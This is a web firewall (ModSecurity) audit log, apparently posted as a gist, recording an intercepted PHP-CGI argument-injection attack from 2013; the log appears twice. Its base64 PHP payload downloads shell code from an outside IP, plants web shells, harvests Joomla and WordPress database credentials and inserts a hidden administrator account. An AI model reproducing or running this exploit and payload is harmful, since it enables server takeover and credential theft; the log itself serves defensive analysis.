derhansen/gist:7410311

## gistfile1.txt
--dafe1c1b-A--
[10/Nov/2013:07:44:03 +0100] Un8rMgqXZAQAACKaBUkAAAAC xxx.xxx.xxx.xxx 50937 xxx.xxx.xxx.xxx

--dafe1c1b-B--
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: xxxxxxxxxx.tld
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded
Content-Length: 6013
Connection: close

--dafe1c1b-C--
<?PHP eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBkb0RpcmVjdG9yeSgkZGlyLCAkc2hlbGxDb2RlKQp7CgkkYWxsRmlsZXMgPSBnbG9iKCRkaXIuJy8qJyk7Cglmb3JlYWNoKCRhbGxGaWxlcyBhcyAkZmlsZSkKCXsKCQlpZihpc19kaXIoJGZpbGUpICYmICRmaWxlIDw+ICIuIiAmJiAkZmlsZSA8PiAiLi4iKQoJCXsKCQkJZmlsZV9wdXRfY29udGVudHMoJGZpbGUuJy9jb25maWcuYmFrLnBocCcsICRzaGVsbENvZGUpOwoJCQlpZihmaWxlX2V4aXN0cygkZmlsZS4nL2NvbmZpZy5iYWsucGhwJykpCgkJCXsKCQkJCWVjaG8gJ0RBVEFfQkVHSU4nLiRmaWxlLicvY29uZmlnLmJhay5waHAnLidEQVRBX0VORCc7CgkJCX0KCQl9Cgl9Cn0KZnVuY3Rpb24gc3RyX2JldHdlZW4oJGJ1ZiwgJHN0cjEsICRzdHIyLCAkb2Zmc2V0PTApCnsKCWlmICgoJHA9c3RycG9zKCRidWYsICRzdHIxLCAkb2Zmc2V0KSk9PT1mYWxzZSkKCXsKCQlyZXR1cm4gZmFsc2U7Cgl9CgkkdD0kcCtzdHJsZW4oJHN0cjEpOwoJaWYgKCgkdDE9c3RycG9zKCRidWYsICRzdHIyLCAkdCkpPT09ZmFsc2UpCgl7CgkJcmV0dXJuIGZhbHNlOwoJfQoJcmV0dXJuIHN1YnN0cigkYnVmLCAkdCwgJHQxLSR0KTsKfQpmdW5jdGlvbiBkb0pvb21sYURpcigkZGlyKQp7CgkkYWxsRmlsZXMgPSBnbG9iKCRkaXIuJy8qJyk7Cglmb3JlYWNoKCRhbGxGaWxlcyBhcyAkZmlsZSkKCXsKCQlpZihpc19kaXIoJGZpbGUpICYmICRmaWxlIDw+ICIuIiAmJiAkZmlsZSA8PiAiLi4iKQoJCXsKCQkJZG9Kb29tbGEoJGZpbGUpOwoJCX0KCX0KfQpmdW5jdGlvbiBkb0pvb21sYSgkZGlyKQp7CglpZighZmlsZV9leGlzdHMoJGRpci4nL2NvbmZpZ3VyYXRpb24ucGhwJykpCgkJcmV0dXJuOwoJCSRjb25maWcgPSBmaWxlX2dldF9jb250ZW50cygkZGlyLicvY29uZmlndXJhdGlvbi5waHAnKTsKCQllY2hvICJKT09NTEFfQ09ORklHX0JFRyIuJGRpci4nL2NvbmZpZ3VyYXRpb24ucGhwJy4kY29uZmlnLiJKT09NTEFfQ09ORklHX0VORCI7CgkJLy8KCQkkaG9zdCA9IHN0cl9iZXR3ZWVuKCRjb25maWcsICd2YXIgJGhvc3QgPSBcJycsICAgICAnXCc7Jyk7CgkJJHVzZXIgPSBzdHJfYmV0d2VlbigkY29uZmlnLCAndmFyICR1c2VyID0gXCcnLCAgICAgJ1wnOycpOwoJCSRuYW1lID0gc3RyX2JldHdlZW4oJGNvbmZpZywgJ3ZhciAkZGIgPSBcJycsICAgICAgICdcJzsnKTsKCQkkcGFzc3dvcmQgPSBzdHJfYmV0d2VlbigkY29uZmlnLCAndmFyICRwYXNzd29yZCA9IFwnJywgJ1wnOycpOwoJCSRkYnByZWZpeCA9IHN0cl9iZXR3ZWVuKCRjb25maWcsICd2YXIgJGRicHJlZml4ID0gXCcnLCAnXCc7Jyk7CgkJJGRiID0gc3RyX2JldHdlZW4oJGNvbmZpZywgJ3ZhciAkZGIgPSBcJycsICdcJzsnKTsKCQkvLwoJCWVjaG8gIkpPT01MQV9VU0VSU19CRUciOwoJCSRleGVjdXRlID0gIklOU0VSVCBJTlRPICIuJGRicHJlZml4LiJ1c2VycyAobmFtZSwgdXNlcm5hbWUsIHBhc3N3b3JkLCBwYXJhbXMpIFZBTFVFUyAoJ0Nyb25BZG1pbicsICdDcm9uQWRtaW4nLCAgICdjNzFlMzI0YTFjMWE5YmEyMzkxNzQ4MWYxMWRiZjAyMycsICcnKTtJTlNFUlQgSU5UTyAiLiRkYnByZWZpeC4idXNlcl91c2VyZ3JvdXBfbWFwICh1c2VyX2lkLGdyb3VwX2lkKVZBTFVFUyAoTEFTVF9JTlNFUlRfSUQoKSwnOCcpOyI7CgkJJGNtZCA9ICJteXNxbCAtLWhvc3Q9Ii4kaG9zdC4iIC0tdXNlcj0iLiR1c2VyLiIgLS1wYXNzd29yZD0iLiRwYXNzd29yZC4iIC0tZGF0YWJhc2U9Ii4kZGIuIiAtLWV4ZWN1dGU9XCIiLiRleGVjdXRlLiJcIjsiOwoJCS8vZWNobyAkY21kOwoJCXN5c3RlbSgkY21kKTsKCQkkZXhlY3V0ZSA9ICJTRUxFQ1QgKiBGUk9NICIuJGRicHJlZml4LiJ1c2VyczsiOwoJCSRjbWQgPSAibXlzcWwgLS1ob3N0PSIuJGhvc3QuIiAtLXVzZXI9Ii4kdXNlci4iIC0tcGFzc3dvcmQ9Ii4kcGFzc3dvcmQuIiAtLWRhdGFiYXNlPSIuJGRiLiIgLS1leGVjdXRlPVwiIi4kZXhlY3V0ZS4iXCI7IjsKCQkvL2VjaG8gJGNtZDsKCQlzeXN0ZW0oJGNtZCk7CgkJZWNobyAiSk9PTUxBX1VTRVJTX0VORCI7Cn0KZnVuY3Rpb24gZG9Xb3JkcHJlc3MoJGRpcikKewoJaWYoIWZpbGVfZXhpc3RzKCRkaXIuJy93cC1jb25maWcucGhwJykpCgkJcmV0dXJuOwoJJGNvbmZpZyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRkaXIuJy93cC1jb25maWcucGhwJyk7CgllY2hvICJXUF9DT05GSUdfQkVHIi4kZGlyLicvd3AtY29uZmlnLnBocCcuJGNvbmZpZy4iV1BfQ09ORklHX0VORCI7CgllY2hvICJXUF9VU0VSU19CRUciOwoJLy8KCSRkYmhvc3QgPSBzdHJfYmV0d2VlbigkY29uZmlnLCAnZGVmaW5lKFwnREJfSE9TVFwnLCBcJycsICAgICAnXCcpOycpOwoJJGRidXNlciA9IHN0cl9iZXR3ZWVuKCRjb25maWcsICdkZWZpbmUoXCdEQl9VU0VSXCcsIFwnJywgICAgICdcJyk7Jyk7CgkkZGJuYW1lID0gc3RyX2JldHdlZW4oJGNvbmZpZywgJ2RlZmluZShcJ0RCX05BTUVcJywgXCcnLCAgICAgJ1wnKTsnKTsKCSRkYnBhc3MgPSBzdHJfYmV0d2VlbigkY29uZmlnLCAnZGVmaW5lKFwnREJfUEFTU1dPUkRcJywgXCcnLCAnXCcpOycpOwoJJGRicHJlZml4ID0gc3RyX2JldHdlZW4oJGNvbmZpZywgJyR0YWJsZV9wcmVmaXggID0gXCcnLCAnXCc7Jyk7CgkkZGJuYW1lID0gc3RyX2JldHdlZW4oJGNvbmZpZywgJ2RlZmluZShcJ0RCX05BTUVcJywgXCcnLCAnXCcnKTsKCS8vCgkkZXhlY3V0ZSA9ICJJTlNFUlQgSU5UTyAiLiRkYnByZWZpeC4idXNlcnMgKElELCB1c2VyX2xvZ2luLCB1c2VyX3Bhc3MsIHVzZXJfbmljZW5hbWUsIHVzZXJfZW1haWwsIHVzZXJfdXJsLCB1c2VyX3JlZ2lzdGVyZWQsIHVzZXJfYWN0aXZhdGlvbl9rZXksIHVzZXJfc3RhdHVzLCBkaXNwbGF5X25hbWUpIFZBTFVFUyAoJzMxNjUnLCAnQ3JvbkFkbWluJywgJ2M3MWUzMjRhMWMxYTliYTIzOTE3NDgxZjExZGJmMDIzJywgJ1N5ZWQgQmFsa2hpJywgJ3Rlc3RAeW91cmRvbWFpbi5jb20nLCAnJywgJzIwMTEtMDYtMDcgMDA6MDA6MDAnLCAnJywgJzAnLCAnU3llZCBCYWxraGknKTsiLiJJTlNFUlQgSU5UTyAiLiRkYnByZWZpeC4idXNlcm1ldGEgKHVtZXRhX2lkLCB1c2VyX2lkLCBtZXRhX2tleSwgbWV0YV92YWx1ZSkgVkFMVUVTIChOVUxMLCAnMzE2NScsICd3cF9jYXBhYmlsaXRpZXMnLCAnYToxOntzOjEzOlwiYWRtaW5pc3RyYXRvclwiO3M6MTpcIjFcIjt9Jyk7Ii4iSU5TRVJUIElOVE8gIi4kZGJwcmVmaXguInVzZXJtZXRhICh1bWV0YV9pZCwgdXNlcl9pZCwgbWV0YV9rZXksIG1ldGFfdmFsdWUpIFZBTFVFUyAoTlVMTCwgJzMxNjUnLCAnd3BfdXNlcl9sZXZlbCcsICcxMCcpOyI7CgkkY21kID0gIm15c3FsIC0taG9zdD0iLiRkYmhvc3QuIiAtLXVzZXI9Ii4kZGJ1c2VyLiIgLS1wYXNzd29yZD0iLiRkYnBhc3MuIiAtLWRhdGFiYXNlPSIuJGRibmFtZS4iIC0tZXhlY3V0ZT1cIiIuJGV4ZWN1dGUuIlwiOyI7CgkvL2VjaG8gJGNtZDsKCXN5c3RlbSgkY21kKTsKCSRleGVjdXRlID0gIlNFTEVDVCAqIEZST00gIi4kZGJwcmVmaXguInVzZXJzOyI7CgkkY21kID0gIm15c3FsIC0taG9zdD0iLiRkYmhvc3QuIiAtLXVzZXI9Ii4kZGJ1c2VyLiIgLS1wYXNzd29yZD0iLiRkYnBhc3MuIiAtLWRhdGFiYXNlPSIuJGRibmFtZS4iIC0tZXhlY3V0ZT1cIiIuJGV4ZWN1dGUuIlwiOyI7CgkvL2VjaG8gJGNtZDsKCXN5c3RlbSgkY21kKTsKCWVjaG8gIldQX1VTRVJTX0VORCI7Cn0KZnVuY3Rpb24gZG9Xb3JkcHJlc3NEaXIoJGRpcikKewoJJGFsbEZpbGVzID0gZ2xvYigkZGlyLicvKicpOwoJZm9yZWFjaCgkYWxsRmlsZXMgYXMgJGZpbGUpCgl7CgkJaWYoaXNfZGlyKCRmaWxlKSAmJiAkZmlsZSA8PiAiLiIgJiYgJGZpbGUgPD4gIi4uIikKCQl7CgkJCWRvV29yZHByZXNzKCRmaWxlKTsKCQl9Cgl9Cn0KJHNoZWxsQ29kZSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vMjEzLjE4My41OS4zLzEudHh0Iik7CiRkb2NSb290ID0gJF9TRVJWRVJbIkRPQ1VNRU5UX1JPT1QiXTsKZmlsZV9wdXRfY29udGVudHMoc3RyX3JlcGxhY2UoIi8vIiwgIi8iLCAkZG9jUm9vdC4nL2NvbmZpZy5iYWsucGhwJyksICRzaGVsbENvZGUpOwovLxVBOzggNzA7ODIwNUJBTyAyIDo+QDU9TCAtIDcwOzgyMDU8IDIgOj5ANT1MLgppZihmaWxlX2V4aXN0cygkZG9jUm9vdC4nL2NvbmZpZy5iYWsucGhwJykpCnsKCWVjaG8gIkRBVEFfQkVHSU4iLiRkb2NSb290LicvY29uZmlnLmJhay5waHAnLiJEQVRBX0VORCI7Cn0KLy8XMDs4MjA1PCAyIDQ+QUJDPz1LNSA9MCA3MD84QUwgPzA/OjguCmRvRGlyZWN0b3J5KCRkb2NSb290LicvLi4vJywgJHNoZWxsQ29kZSk7CmRvRGlyZWN0b3J5KCRkb2NSb290LicvLi4vLi4vJywgJHNoZWxsQ29kZSk7Ci8vCmRvSm9vbWxhRGlyKCRkb2NSb290LicvLi4vJyk7CmRvSm9vbWxhRGlyKCRkb2NSb290LicvLi4vLi4vJyk7Ci8vCmRvV29yZHByZXNzRGlyKCRkb2NSb290LicvLi4vJyk7CmRvV29yZHByZXNzRGlyKCRkb2NSb290LicvLi4vLi4vJyk7')); ?>
--dafe1c1b-F--

--dafe1c1b-H--
Message: Access denied with code 403 (phase 2). Pattern match "<\\?(?!xml)" at ARGS_NAMES:<?PHP eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBkb0RpcmVjdG9yeSgkZGlyLCAkc2hlbGxDb2RlKQp7CgkkYWxsRmlsZXMgPSBnbG9iKCRkaXIuJy8qJyk7Cglmb3JlYWNoKCRhbGxGaWxlcyBhcyAkZmlsZSkKCXsKCQlpZihpc19kaXIoJGZpbGUpICYmICRmaWxlIDw ICIuIiAmJiAkZmlsZSA8PiAiLi4iKQoJCXsKCQkJZmlsZV9wdXRfY29udGVudHMoJGZpbGUuJy9jb25maWcuYmFrLnBocCcsICRzaGVsbENvZGUpOwoJCQlpZihmaWxlX2V4aXN0cygkZmlsZS4nL2NvbmZpZy5iYWsucGhwJykpCgkJCXsKCQkJCWVjaG8gJ0RBVEFfQkVHSU4nLiRmaWxlLicvY29uZmlnLmJhay5waHAnLidEQVRBX0VORCc7CgkJCX0KCQl9Cgl9Cn0KZnVuY3Rpb24gc3RyX2JldHdlZW4oJGJ1ZiwgJHN0cjEsICRzdHIyLCAkb2Zmc2V0PTApCnsKCWlmICgoJHA9c3RycG9zKCRidWYsICRzdHIxLCAkb2Zmc2V0KSk9PT1mYWxzZSkKCXsKCQlyZXR1cm4gZmFsc2U7Cgl9CgkkdD0kcCtzdHJsZW4oJHN0cjEpOwoJaWYgKCgkdDE9c3RycG9zKCRidWYsICRzdHIyLCAkdCkpPT09ZmFsc2UpCgl7CgkJcmV0dXJuIGZhbHNlOwoJfQoJcmV0dXJuIHN1YnN0cigkYnVmLCAkdCwgJHQxLSR0KTsKfQpmdW5jdGlvbiBkb0pvb21sYURpcigkZGlyKQp7CgkkYWxsRmlsZXMgPSBnbG9iKCRkaXIuJy8qJyk7Cglmb3JlYWNoKCRhbGxGaWxlcyBh
Action: Intercepted (phase 2)
Stopwatch: 1384065842987057 134082 (- - -)
Stopwatch2: 1384065842987057 134082; combined=14809, p1=634, p2=14087, p3=0, p4=0, p5=87, sr=95, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.7.4 (http://www.modsecurity.org/); OWASP_CRS/2.2.7.
Server: Apache
Engine-Mode: "ENABLED"
	--dafe1c1b-A--
	[10/Nov/2013:07:44:03 +0100] Un8rMgqXZAQAACKaBUkAAAAC xxx.xxx.xxx.xxx 50937 xxx.xxx.xxx.xxx

	--dafe1c1b-B--
	POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
	Host: xxxxxxxxxx.tld
	User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 6013
	Connection: close

	--dafe1c1b-C--
	<?PHP eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBkb0RpcmVjdG9yeSgkZGlyLCAkc2hlbGxDb2RlKQp7CgkkYWxsRmlsZXMgPSBnbG9iKCRkaXIuJy8qJyk7Cglmb3JlYWNoKCRhbGxGaWxlcyBhcyAkZmlsZSkKCXsKCQlpZihpc19kaXIoJGZpbGUpICYmICRmaWxlIDw+ICIuIiAmJiAkZmlsZSA8PiAiLi4iKQoJCXsKCQkJZmlsZV9wdXRfY29udGVudHMoJGZpbGUuJy9jb25maWcuYmFrLnBocCcsICRzaGVsbENvZGUpOwoJCQlpZihmaWxlX2V4aXN0cygkZmlsZS4nL2NvbmZpZy5iYWsucGhwJykpCgkJCXsKCQkJCWVjaG8gJ0RBVEFfQkVHSU4nLiRmaWxlLicvY29uZmlnLmJhay5waHAnLidEQVRBX0VORCc7CgkJCX0KCQl9Cgl9Cn0KZnVuY3Rpb24gc3RyX2JldHdlZW4oJGJ1ZiwgJHN0cjEsICRzdHIyLCAkb2Zmc2V0PTApCnsKCWlmICgoJHA9c3RycG9zKCRidWYsICRzdHIxLCAkb2Zmc2V0KSk9PT1mYWxzZSkKCXsKCQlyZXR1cm4gZmFsc2U7Cgl9CgkkdD0kcCtzdHJsZW4oJHN0cjEpOwoJaWYgKCgkdDE9c3RycG9zKCRidWYsICRzdHIyLCAkdCkpPT09ZmFsc2UpCgl7CgkJcmV0dXJuIGZhbHNlOwoJfQoJcmV0dXJuIHN1YnN0cigkYnVmLCAkdCwgJHQxLSR0KTsKfQpmdW5jdGlvbiBkb0pvb21sYURpcigkZGlyKQp7CgkkYWxsRmlsZXMgPSBnbG9iKCRkaXIuJy8qJyk7Cglmb3JlYWNoKCRhbGxGaWxlcyBhcyAkZmlsZSkKCXsKCQlpZihpc19kaXIoJGZpbGUpICYmICRmaWxlIDw+ICIuIiAmJiAkZmlsZSA8PiAiLi4iKQoJCXsKCQkJZG9Kb29tbGEoJGZpbGUpOwoJCX0KCX0KfQpmdW5jdGlvbiBkb0pvb21sYSgkZGlyKQp7CglpZighZmlsZV9leGlzdHMoJGRpci4nL2NvbmZpZ3VyYXRpb24ucGhwJykpCgkJcmV0dXJuOwoJCSRjb25maWcgPSBmaWxlX2dldF9jb250ZW50cygkZGlyLicvY29uZmlndXJhdGlvbi5waHAnKTsKCQllY2hvICJKT09NTEFfQ09ORklHX0JFRyIuJGRpci4nL2NvbmZpZ3VyYXRpb24ucGhwJy4kY29uZmlnLiJKT09NTEFfQ09ORklHX0VORCI7CgkJLy8KCQkkaG9zdCA9IHN0cl9iZXR3ZWVuKCRjb25maWcsICd2YXIgJGhvc3QgPSBcJycsICAgICAnXCc7Jyk7CgkJJHVzZXIgPSBzdHJfYmV0d2VlbigkY29uZmlnLCAndmFyICR1c2VyID0gXCcnLCAgICAgJ1wnOycpOwoJCSRuYW1lID0gc3RyX2JldHdlZW4oJGNvbmZpZywgJ3ZhciAkZGIgPSBcJycsICAgICAgICdcJzsnKTsKCQkkcGFzc3dvcmQgPSBzdHJfYmV0d2VlbigkY29uZmlnLCAndmFyICRwYXNzd29yZCA9IFwnJywgJ1wnOycpOwoJCSRkYnByZWZpeCA9IHN0cl9iZXR3ZWVuKCRjb25maWcsICd2YXIgJGRicHJlZml4ID0gXCcnLCAnXCc7Jyk7CgkJJGRiID0gc3RyX2JldHdlZW4oJGNvbmZpZywgJ3ZhciAkZGIgPSBcJycsICdcJzsnKTsKCQkvLwoJCWVjaG8gIkpPT01MQV9VU0VSU19CRUciOwoJCSRleGVjdXRlID0gIklOU0VSVCBJTlRPICIuJGRicHJlZml4LiJ1c2VycyAobmFtZSwgdXNlcm5hbWUsIHBhc3N3b3JkLCBwYXJhbXMpIFZBTFVFUyAoJ0Nyb25BZG1pbicsICdDcm9uQWRtaW4nLCAgICdjNzFlMzI0YTFjMWE5YmEyMzkxNzQ4MWYxMWRiZjAyMycsICcnKTtJTlNFUlQgSU5UTyAiLiRkYnByZWZpeC4idXNlcl91c2VyZ3JvdXBfbWFwICh1c2VyX2lkLGdyb3VwX2lkKVZBTFVFUyAoTEFTVF9JTlNFUlRfSUQoKSwnOCcpOyI7CgkJJGNtZCA9ICJteXNxbCAtLWhvc3Q9Ii4kaG9zdC4iIC0tdXNlcj0iLiR1c2VyLiIgLS1wYXNzd29yZD0iLiRwYXNzd29yZC4iIC0tZGF0YWJhc2U9Ii4kZGIuIiAtLWV4ZWN1dGU9XCIiLiRleGVjdXRlLiJcIjsiOwoJCS8vZWNobyAkY21kOwoJCXN5c3RlbSgkY21kKTsKCQkkZXhlY3V0ZSA9ICJTRUxFQ1QgKiBGUk9NICIuJGRicHJlZml4LiJ1c2VyczsiOwoJCSRjbWQgPSAibXlzcWwgLS1ob3N0PSIuJGhvc3QuIiAtLXVzZXI9Ii4kdXNlci4iIC0tcGFzc3dvcmQ9Ii4kcGFzc3dvcmQuIiAtLWRhdGFiYXNlPSIuJGRiLiIgLS1leGVjdXRlPVwiIi4kZXhlY3V0ZS4iXCI7IjsKCQkvL2VjaG8gJGNtZDsKCQlzeXN0ZW0oJGNtZCk7CgkJZWNobyAiSk9PTUxBX1VTRVJTX0VORCI7Cn0KZnVuY3Rpb24gZG9Xb3JkcHJlc3MoJGRpcikKewoJaWYoIWZpbGVfZXhpc3RzKCRkaXIuJy93cC1jb25maWcucGhwJykpCgkJcmV0dXJuOwoJJGNvbmZpZyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRkaXIuJy93cC1jb25maWcucGhwJyk7CgllY2hvICJXUF9DT05GSUdfQkVHIi4kZGlyLicvd3AtY29uZmlnLnBocCcuJGNvbmZpZy4iV1BfQ09ORklHX0VORCI7CgllY2hvICJXUF9VU0VSU19CRUciOwoJLy8KCSRkYmhvc3QgPSBzdHJfYmV0d2VlbigkY29uZmlnLCAnZGVmaW5lKFwnREJfSE9TVFwnLCBcJycsICAgICAnXCcpOycpOwoJJGRidXNlciA9IHN0cl9iZXR3ZWVuKCRjb25maWcsICdkZWZpbmUoXCdEQl9VU0VSXCcsIFwnJywgICAgICdcJyk7Jyk7CgkkZGJuYW1lID0gc3RyX2JldHdlZW4oJGNvbmZpZywgJ2RlZmluZShcJ0RCX05BTUVcJywgXCcnLCAgICAgJ1wnKTsnKTsKCSRkYnBhc3MgPSBzdHJfYmV0d2VlbigkY29uZmlnLCAnZGVmaW5lKFwnREJfUEFTU1dPUkRcJywgXCcnLCAnXCcpOycpOwoJJGRicHJlZml4ID0gc3RyX2JldHdlZW4oJGNvbmZpZywgJyR0YWJsZV9wcmVmaXggID0gXCcnLCAnXCc7Jyk7CgkkZGJuYW1lID0gc3RyX2JldHdlZW4oJGNvbmZpZywgJ2RlZmluZShcJ0RCX05BTUVcJywgXCcnLCAnXCcnKTsKCS8vCgkkZXhlY3V0ZSA9ICJJTlNFUlQgSU5UTyAiLiRkYnByZWZpeC4idXNlcnMgKElELCB1c2VyX2xvZ2luLCB1c2VyX3Bhc3MsIHVzZXJfbmljZW5hbWUsIHVzZXJfZW1haWwsIHVzZXJfdXJsLCB1c2VyX3JlZ2lzdGVyZWQsIHVzZXJfYWN0aXZhdGlvbl9rZXksIHVzZXJfc3RhdHVzLCBkaXNwbGF5X25hbWUpIFZBTFVFUyAoJzMxNjUnLCAnQ3JvbkFkbWluJywgJ2M3MWUzMjRhMWMxYTliYTIzOTE3NDgxZjExZGJmMDIzJywgJ1N5ZWQgQmFsa2hpJywgJ3Rlc3RAeW91cmRvbWFpbi5jb20nLCAnJywgJzIwMTEtMDYtMDcgMDA6MDA6MDAnLCAnJywgJzAnLCAnU3llZCBCYWxraGknKTsiLiJJTlNFUlQgSU5UTyAiLiRkYnByZWZpeC4idXNlcm1ldGEgKHVtZXRhX2lkLCB1c2VyX2lkLCBtZXRhX2tleSwgbWV0YV92YWx1ZSkgVkFMVUVTIChOVUxMLCAnMzE2NScsICd3cF9jYXBhYmlsaXRpZXMnLCAnYToxOntzOjEzOlwiYWRtaW5pc3RyYXRvclwiO3M6MTpcIjFcIjt9Jyk7Ii4iSU5TRVJUIElOVE8gIi4kZGJwcmVmaXguInVzZXJtZXRhICh1bWV0YV9pZCwgdXNlcl9pZCwgbWV0YV9rZXksIG1ldGFfdmFsdWUpIFZBTFVFUyAoTlVMTCwgJzMxNjUnLCAnd3BfdXNlcl9sZXZlbCcsICcxMCcpOyI7CgkkY21kID0gIm15c3FsIC0taG9zdD0iLiRkYmhvc3QuIiAtLXVzZXI9Ii4kZGJ1c2VyLiIgLS1wYXNzd29yZD0iLiRkYnBhc3MuIiAtLWRhdGFiYXNlPSIuJGRibmFtZS4iIC0tZXhlY3V0ZT1cIiIuJGV4ZWN1dGUuIlwiOyI7CgkvL2VjaG8gJGNtZDsKCXN5c3RlbSgkY21kKTsKCSRleGVjdXRlID0gIlNFTEVDVCAqIEZST00gIi4kZGJwcmVmaXguInVzZXJzOyI7CgkkY21kID0gIm15c3FsIC0taG9zdD0iLiRkYmhvc3QuIiAtLXVzZXI9Ii4kZGJ1c2VyLiIgLS1wYXNzd29yZD0iLiRkYnBhc3MuIiAtLWRhdGFiYXNlPSIuJGRibmFtZS4iIC0tZXhlY3V0ZT1cIiIuJGV4ZWN1dGUuIlwiOyI7CgkvL2VjaG8gJGNtZDsKCXN5c3RlbSgkY21kKTsKCWVjaG8gIldQX1VTRVJTX0VORCI7Cn0KZnVuY3Rpb24gZG9Xb3JkcHJlc3NEaXIoJGRpcikKewoJJGFsbEZpbGVzID0gZ2xvYigkZGlyLicvKicpOwoJZm9yZWFjaCgkYWxsRmlsZXMgYXMgJGZpbGUpCgl7CgkJaWYoaXNfZGlyKCRmaWxlKSAmJiAkZmlsZSA8PiAiLiIgJiYgJGZpbGUgPD4gIi4uIikKCQl7CgkJCWRvV29yZHByZXNzKCRmaWxlKTsKCQl9Cgl9Cn0KJHNoZWxsQ29kZSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vMjEzLjE4My41OS4zLzEudHh0Iik7CiRkb2NSb290ID0gJF9TRVJWRVJbIkRPQ1VNRU5UX1JPT1QiXTsKZmlsZV9wdXRfY29udGVudHMoc3RyX3JlcGxhY2UoIi8vIiwgIi8iLCAkZG9jUm9vdC4nL2NvbmZpZy5iYWsucGhwJyksICRzaGVsbENvZGUpOwovLxVBOzggNzA7ODIwNUJBTyAyIDo+QDU9TCAtIDcwOzgyMDU8IDIgOj5ANT1MLgppZihmaWxlX2V4aXN0cygkZG9jUm9vdC4nL2NvbmZpZy5iYWsucGhwJykpCnsKCWVjaG8gIkRBVEFfQkVHSU4iLiRkb2NSb290LicvY29uZmlnLmJhay5waHAnLiJEQVRBX0VORCI7Cn0KLy8XMDs4MjA1PCAyIDQ+QUJDPz1LNSA9MCA3MD84QUwgPzA/OjguCmRvRGlyZWN0b3J5KCRkb2NSb290LicvLi4vJywgJHNoZWxsQ29kZSk7CmRvRGlyZWN0b3J5KCRkb2NSb290LicvLi4vLi4vJywgJHNoZWxsQ29kZSk7Ci8vCmRvSm9vbWxhRGlyKCRkb2NSb290LicvLi4vJyk7CmRvSm9vbWxhRGlyKCRkb2NSb290LicvLi4vLi4vJyk7Ci8vCmRvV29yZHByZXNzRGlyKCRkb2NSb290LicvLi4vJyk7CmRvV29yZHByZXNzRGlyKCRkb2NSb290LicvLi4vLi4vJyk7')); ?>
	--dafe1c1b-F--

	--dafe1c1b-H--
	Message: Access denied with code 403 (phase 2). Pattern match "<\\?(?!xml)" at ARGS_NAMES:<?PHP eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBkb0RpcmVjdG9yeSgkZGlyLCAkc2hlbGxDb2RlKQp7CgkkYWxsRmlsZXMgPSBnbG9iKCRkaXIuJy8qJyk7Cglmb3JlYWNoKCRhbGxGaWxlcyBhcyAkZmlsZSkKCXsKCQlpZihpc19kaXIoJGZpbGUpICYmICRmaWxlIDw ICIuIiAmJiAkZmlsZSA8PiAiLi4iKQoJCXsKCQkJZmlsZV9wdXRfY29udGVudHMoJGZpbGUuJy9jb25maWcuYmFrLnBocCcsICRzaGVsbENvZGUpOwoJCQlpZihmaWxlX2V4aXN0cygkZmlsZS4nL2NvbmZpZy5iYWsucGhwJykpCgkJCXsKCQkJCWVjaG8gJ0RBVEFfQkVHSU4nLiRmaWxlLicvY29uZmlnLmJhay5waHAnLidEQVRBX0VORCc7CgkJCX0KCQl9Cgl9Cn0KZnVuY3Rpb24gc3RyX2JldHdlZW4oJGJ1ZiwgJHN0cjEsICRzdHIyLCAkb2Zmc2V0PTApCnsKCWlmICgoJHA9c3RycG9zKCRidWYsICRzdHIxLCAkb2Zmc2V0KSk9PT1mYWxzZSkKCXsKCQlyZXR1cm4gZmFsc2U7Cgl9CgkkdD0kcCtzdHJsZW4oJHN0cjEpOwoJaWYgKCgkdDE9c3RycG9zKCRidWYsICRzdHIyLCAkdCkpPT09ZmFsc2UpCgl7CgkJcmV0dXJuIGZhbHNlOwoJfQoJcmV0dXJuIHN1YnN0cigk